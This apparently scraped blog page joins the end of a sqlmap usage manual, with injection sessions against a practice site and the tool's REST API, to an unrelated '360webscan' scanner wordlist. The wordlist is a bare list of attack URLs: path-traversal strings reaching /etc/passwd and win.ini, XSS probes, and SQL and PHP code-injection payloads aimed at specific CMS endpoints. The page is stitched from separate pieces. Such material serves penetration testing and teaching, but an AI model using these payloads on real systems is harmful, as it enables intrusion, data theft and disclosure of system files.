time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[xx:xx:15] [INFO] target URL appears to have 3 columns in query
[xx:xx:16] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 2
0 columns' injectable
GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 39 HTTP(s) re
quests:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5707=5707

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
NULL,NULL-- -
---
[xx:xx:16] [INFO] testing MySQL
[xx:xx:16] [INFO] confirming MySQL
[xx:xx:16] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
[xx:xx:16] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
p/output/testphp.vulnweb.com'
sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
         _
 ___ ___| |_____ ___ ___  {1.0-dev-2188502}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:25

[xx:xx:26] [INFO] resuming back-end DBMS 'mysql' 
[xx:xx:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 5707=5707

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
NULL,NULL-- -
---
[xx:xx:26] [INFO] the back-end DBMS is MySQL
[xx:xx:26] [INFO] fetching banner
web application technology: Nginx, PHP 5.3.10
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5
banner:    '5.1.73-0ubuntu0.10.04.1'
[xx:xx:26] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
p/output/testphp.vulnweb.com' 
sqlmap-shell> exit

Simple wizard interface for beginner users

Switch: --wizard

For beginner users there is a wizard interface which uses a simple workflow with as little questions as possible. If user just enters target URL and uses default answers (e.g. by pressing Enter) he should have a properly set sqlmap run environment by the end of the workflow.

Example against a Microsoft SQL Server target:

$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable 
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at xx:xx:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_in
t.asp?id=1
POST data (--data) [Enter for None]: 
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL S
erver'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+C
HAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58
)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(1
00)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+
CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)-- 

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT 
(CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR
(109)+CHAR(113)+CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
    Oct 14 2005 00:33:37 
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user:    'sa'
current database:    'testdb'
current user is DBA:    True

[*] shutting down at xx:xx:52

API (REST-JSON)

sqlmap can be run through the REST-JSON API, API (abbr. for Application Program Interface) that uses JSON for REST (abbr. for REpresentational State Transfer) communication between server and client instance(s). In plainspeak, server runs the sqlmap scan(s), while clients are setting the sqlmap options/switches and pull the results back. Main program file for running the API is sqlmapapi.py, while the client can also be implemented inside the arbitrary user program.

$ python sqlmapapi.py -hh
Usage: sqlmapapi.py [options]

Options:
  -h, --help            show this help message and exit
  -s, --server          Act as a REST-JSON API server
  -c, --client          Act as a REST-JSON API client
  -H HOST, --host=HOST  Host of the REST-JSON API server (default "127.0.0.1")
  -p PORT, --port=PORT  Port of the the REST-JSON API server (default 8775)
  --adapter=ADAPTER     Server (bottle) adapter to use (default "wsgiref")

Server runs the sqlmapapi.py by using switch -s, client by using switch -c, while in both cases user can (optionally) set listening IP address with option -H (default "127.0.0.1") and listening port with option -p (default 8775). Each client’s “session” can have multiple “tasks” (i.e. sqlmap scan runs), where user can arbitrary choose which task should be currently active.

Inside the client’s command line interface available commands are:

• help – showing list of available commands along with basic help information
• new ARGS – starts a new scan task with provided arguments (e.g. new -u "http://testphp.vulnweb.com/artists.php?artist=1")
• use TASKID – switches current context to different task (e.g. use c04d8c5c7582efb4)
• data – retrieves and shows data for current task
• log– retrieves and shows log for current task
• status – retrieves and shows status for current task
• stop – stops current task
• kill – kills current task
• list – displays all tasks (for current session)
• flush – flushes (i.e. deletes) all tasks
• exit – exits the client interface

Example server run:

$ python sqlmapapi.py -s -H "0.0.0.0"
[12:47:51] [INFO] Running REST-JSON API server at '0.0.0.0:8775'..
[12:47:51] [INFO] Admin ID: 89fd118997840a9bd7fc329ab535b881
[12:47:51] [DEBUG] IPC database: /tmp/sqlmapipc-SzBQnd
[12:47:51] [DEBUG] REST-JSON API server connected to IPC database
[12:47:51] [DEBUG] Using adapter 'wsgiref' to run bottle
[12:48:10] [DEBUG] Created new task: 'a42ddaef02e976f0'
[12:48:10] [DEBUG] [a42ddaef02e976f0] Started scan
[12:48:16] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:50] [DEBUG] [a42ddaef02e976f0] Retrieved scan status
[12:48:55] [DEBUG] [a42ddaef02e976f0] Retrieved scan log messages
[12:48:59] [DEBUG] [a42ddaef02e976f0] Retrieved scan data and error messages

Example client run:

$ python sqlmapapi.py -c -H "192.168.110.1"
[12:47:53] [DEBUG] Example client access from command line:
    $ taskid=$(curl http://192.168.110.1:8775/task/new 2>1 | grep -o -I '[a-f0-9
]\{16\}') && echo $taskid
    $ curl -H "Content-Type: application/json" -X POST -d '{"url": "http://testp
hp.vulnweb.com/artists.php?artist=1"}' http://192.168.110.1:8775/scan/$taskid/st
art
    $ curl http://192.168.110.1:8775/scan/$taskid/data
    $ curl http://192.168.110.1:8775/scan/$taskid/log
[12:47:53] [INFO] Starting REST-JSON API client to 'http://192.168.110.1:8775'..
.
[12:47:53] [DEBUG] Calling http://192.168.110.1:8775
[12:47:53] [INFO] Type 'help' or '?' for list of available commands
api> ?
help        Show this help message
new ARGS    Start a new scan task with provided arguments (e.g. 'new -u "http://
testphp.vulnweb.com/artists.php?artist=1"')
use TASKID  Switch current context to different task (e.g. 'use c04d8c5c7582efb4
')
data        Retrieve and show data for current task
log         Retrieve and show log for current task
status      Retrieve and show status for current task
stop        Stop current task
kill        Kill current task
list        Display all tasks
flush       Flush tasks (delete all tasks)
exit        Exit this client
api> new -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner --flush-s
ession
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/task/new
[12:48:10] [INFO] New task ID is 'a42ddaef02e976f0'
[12:48:10] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/start
[12:48:10] [INFO] Scanning started
api (a42ddaef02e976f0)> status
[12:48:16] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu
s
{
    "status": "running", 
    "returncode": null, 
    "success": true
}
api (a42ddaef02e976f0)> status
[12:48:50] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/statu
s
{
    "status": "terminated", 
    "returncode": 0, 
    "success": true
}
api (a42ddaef02e976f0)> log
[12:48:55] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/log
{
    "log": [
        {
            "message": "flushing session file", 
            "level": "INFO", 
            "time": "12:48:10"
        }, 
        {
            "message": "testing connection to the target URL", 
            "level": "INFO", 
            "time": "12:48:10"
        }, 
        {
            "message": "checking if the target is protected by some kind of WAF/
IPS/IDS", 
            "level": "INFO", 
            "time": "12:48:10"
        }, 
        {
            "message": "testing if the target URL is stable", 
            "level": "INFO", 
            "time": "12:48:10"
        }, 
        {
            "message": "target URL is stable", 
            "level": "INFO", 
            "time": "12:48:11"
        }, 
        {
            "message": "testing if GET parameter 'artist' is dynamic", 
            "level": "INFO", 
            "time": "12:48:11"
        }, 
        {
            "message": "confirming that GET parameter 'artist' is dynamic", 
            "level": "INFO", 
            "time": "12:48:11"
        }, 
        {
            "message": "GET parameter 'artist' is dynamic", 
            "level": "INFO", 
            "time": "12:48:11"
        }, 
        {
            "message": "heuristic (basic) test shows that GET parameter 'artist'
 might be injectable (possible DBMS: 'MySQL')", 
            "level": "INFO", 
            "time": "12:48:11"
        }, 
        {
            "message": "testing for SQL injection on GET parameter 'artist'", 
            "level": "INFO", 
            "time": "12:48:11"
        }, 
        {
            "message": "testing 'AND boolean-based blind - WHERE or HAVING claus
e'", 
            "level": "INFO", 
            "time": "12:48:11"
        }, 
        {
            "message": "GET parameter 'artist' appears to be 'AND boolean-based 
blind - WHERE or HAVING clause' injectable (with --string=\"hac\")", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (BIGINT UNSIGNED)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING cla
use (BIGINT UNSIGNED)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (EXP)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING cla
use (EXP)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING,
 ORDER BY or GROUP BY clause (JSON_KEYS)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING c
lause (JSON_KEYS)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (FLOOR)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, OR
DER BY or GROUP BY clause (FLOOR)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (EXTRACTVALUE)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, OR
DER BY or GROUP BY clause (EXTRACTVALUE)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (UPDATEXML)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, OR
DER BY or GROUP BY clause (UPDATEXML)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, O
RDER BY or GROUP BY clause (FLOOR)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING cla
use (FLOOR)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL OR error-based - WHERE or HAVING clause (
FLOOR)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (E
XTRACTVALUE)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (B
IGINT UNSIGNED)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.5 error-based - Parameter replace (E
XP)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.7.8 error-based - Parameter replace 
(JSON_KEYS)'", 
            "level": "INFO", 
            "time": "12:48:12"
        }, 
        {
            "message": "testing 'MySQL >= 5.0 error-based - Parameter replace (F
LOOR)'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (U
PDATEXML)'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL >= 5.1 error-based - Parameter replace (E
XTRACTVALUE)'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL inline queries'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (comment)'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP - c
omment)'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query - c
omment)'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL < 5.0.12 stacked queries (heavy query)'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "testing 'MySQL >= 5.0.12 AND time-based blind'", 
            "level": "INFO", 
            "time": "12:48:13"
        }, 
        {
            "message": "GET parameter 'artist' appears to be 'MySQL >= 5.0.12 AN
D time-based blind' injectable ", 
            "level": "INFO", 
            "time": "12:48:23"
        }, 
        {
            "message": "testing 'Generic UNION query (NULL) - 1 to 20 columns'", 
            "level": "INFO", 
            "time": "12:48:23"
        }, 
        {
            "message": "automatically extending ranges for UNION query injection
 technique tests as there is at least one other (potential) technique found", 
            "level": "INFO", 
            "time": "12:48:23"
        }, 
        {
            "message": "'ORDER BY' technique appears to be usable. This should r
educe the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test", 
            "level": "INFO", 
            "time": "12:48:23"
        }, 
        {
            "message": "target URL appears to have 3 columns in query", 
            "level": "INFO", 
            "time": "12:48:23"
        }, 
        {
            "message": "GET parameter 'artist' is 'Generic UNION query (NULL) - 
1 to 20 columns' injectable", 
            "level": "INFO", 
            "time": "12:48:24"
        }, 
        {
            "message": "the back-end DBMS is MySQL", 
            "level": "INFO", 
            "time": "12:48:24"
        }, 
        {
            "message": "fetching banner", 
            "level": "INFO", 
            "time": "12:48:24"
        }
    ], 
    "success": true
}
api (a42ddaef02e976f0)> data
[12:48:59] [DEBUG] Calling http://192.168.110.1:8775/scan/a42ddaef02e976f0/data
{
    "data": [
        {
            "status": 1, 
            "type": 0, 
            "value": [
                {
                    "dbms": "MySQL", 
                    "suffix": "", 
                    "clause": [
                        1, 
                        9
                    ], 
                    "notes": [], 
                    "ptype": 1, 
                    "dbms_version": [
                        ">= 5.0.12"
                    ], 
                    "prefix": "", 
                    "place": "GET", 
                    "os": null, 
                    "conf": {
                        "code": null, 
                        "string": "hac", 
                        "notString": null, 
                        "titles": false, 
                        "regexp": null, 
                        "textOnly": false, 
                        "optimize": false
                    }, 
                    "parameter": "artist", 
                    "data": {
                        "1": {
                            "comment": "", 
                            "matchRatio": 0.85, 
                            "trueCode": 200, 
                            "title": "AND boolean-based blind - WHERE or HAVING 
clause", 
                            "templatePayload": null, 
                            "vector": "AND [INFERENCE]", 
                            "falseCode": 200, 
                            "where": 1, 
                            "payload": "artist=1 AND 2794=2794"
                        }, 
                        "5": {
                            "comment": "", 
                            "matchRatio": 0.85, 
                            "trueCode": 200, 
                            "title": "MySQL >= 5.0.12 AND time-based blind", 
                            "templatePayload": null, 
                            "vector": "AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLE
EPTIME]),[RANDNUM])", 
                            "falseCode": null, 
                            "where": 1, 
                            "payload": "artist=1 AND SLEEP([SLEEPTIME])"
                        }, 
                        "6": {
                            "comment": "[GENERIC_SQL_COMMENT]", 
                            "matchRatio": 0.85, 
                            "trueCode": null, 
                            "title": "Generic UNION query (NULL) - 1 to 20 colum
ns", 
                            "templatePayload": null, 
                            "vector": [
                                2, 
                                3, 
                                "[GENERIC_SQL_COMMENT]", 
                                "", 
                                "", 
                                "NULL", 
                                2, 
                                false, 
                                false
                            ], 
                            "falseCode": null, 
                            "where": 2, 
                            "payload": "artist=-5376 UNION ALL SELECT NULL,NULL,
CONCAT(0x716b706a71,0x4a754d495377744d4273616c436b4b6a504164666a5572477241596649
704c68614672644a477474,0x7162717171)-- aAjy"
                        }
                    }
                }
            ]
        }, 
        {
            "status": 1, 
            "type": 2, 
            "value": "5.1.73-0ubuntu0.10.04.1"
        }
    ], 
    "success": true, 
    "error": []
}
api (a42ddaef02e976f0)> exit
$

from

The post sqlmap使用手册 sqlmap usage 18年8月22日更新 appeared first on 🔰雨苁ℒ🔰.

360webscan字典

360webscan字典 委内瑞拉数据泄露

/$
/%20..%5Cweb-inf
/%22%3E%3CsCrIpT%3Eprompt(42873)
/%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5C%252e%252e%5Cwindows%5Cwin.ini
/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/%25uff0e%25uff0e/windows/win.ini
/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/%3Cscript%20s%3Ealert(42873)
/%3Cscript%3Ealert(42873).do
/%3f.jsp
/%5C
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/'IHLD
/'[.](,.)(%22HLJX
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./etc/passwd
/.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./.%5c%5c./windows/win.ini
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwinnt/win.ini
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../windows/win.ini
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/.../.../.../.../.../.../.../.../etc/passwd
/.../.../.../.../.../.../.../.../windows/win.ini
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/.bash_history
/.bashrc
/.git/config
/.idea/
/.rediscli_history
/.svn/entries
/.svn/wc.db
//admin/include/common.inc.php?met_admin_type_ok=1&langset=web&met_langadmin[web][]=12345&str=print%28md5%281122%29%29%3B%3F%3E%2f%2f
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/?%22onmouseover='prompt(42873)'bad=%22%3E
/?/home/explore/category-1)%20AND%20(SELECT%204037%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,100,114,108,58),(SELECT%20(CASE%20WHEN%20(4037=4037)%20THEN%201%20ELSE%200%20END)),CHAR(58,122,103,111,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)%20AND%20(9909=9909
/?/people/360webscan?notification_id-360webscan'
/?/people/ajax/user_actions/uid-1__actions-1)%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20and%20(1=1
/?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
/?__runfile0123456789=/etc/passwd
/?__runfile0123456789=c:%5Cwindows%5Cwin.ini
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/?app=vote&controller=vote&action=total&contentid=1%20and%20cast(ascii(substring(version(),1,1))=53%20as%20signed)
/?app=widget&mod=feedlist&act=getdata&maxId=111&act=loadNew&templateCacheFile=C:%5CWindows%5Cwin.ini
/?callback=%3Cscript%3Eprompt(42873)%3C/script%3E
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/?m=User&a=login_800&from=tuan800&sign=xxoo&qname=%27%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2a%29%2CCONCAT%28md5%280x7765627363616e%29%2CFLOOR%28RAND%280%29%2a2%29%29X%20FROM%20information_schema.tables%20GROUP%20BY%20X%29a%29%23
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/?m=info.detail&id=1-webscan
/?m=offer&s=offer_list&id=1-webscan%23
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/?mod=wap&code=coupon_input&msgcode=ops-success&last[]==1%20union%20/*!select*/%201,1,1,1,1,1,1,1234567890,1%20from%20cenwor_system_members
/?overview
/?plugins&area=&class=u_sel&name=work_&q=areas&type=p,c&value=1/**/and/**/extractvalue(1,concat(0x5c,md5(1122)));--
/?plugins&q=area&name=type=p,c&area=1&area_id=updatexml(1,concat(md5(0x41144),user()),1)
/?plugins&q=prosite&site_id=updatexml(1,concat(md5(0x41144),user()),1)
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?s=/abc/abc/abc/$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D/
/?s=abc~abc~abc~$%7B@print(md5(base64_decode(MzYwd2Vic2Nhbg)))%7D
/?search=just_test_not_find_href
/?tag=test'%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1('360webscan'),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'1'='1
/?user&q=action/check_email&email=%27%20and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28md5%280x7765627363616e%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
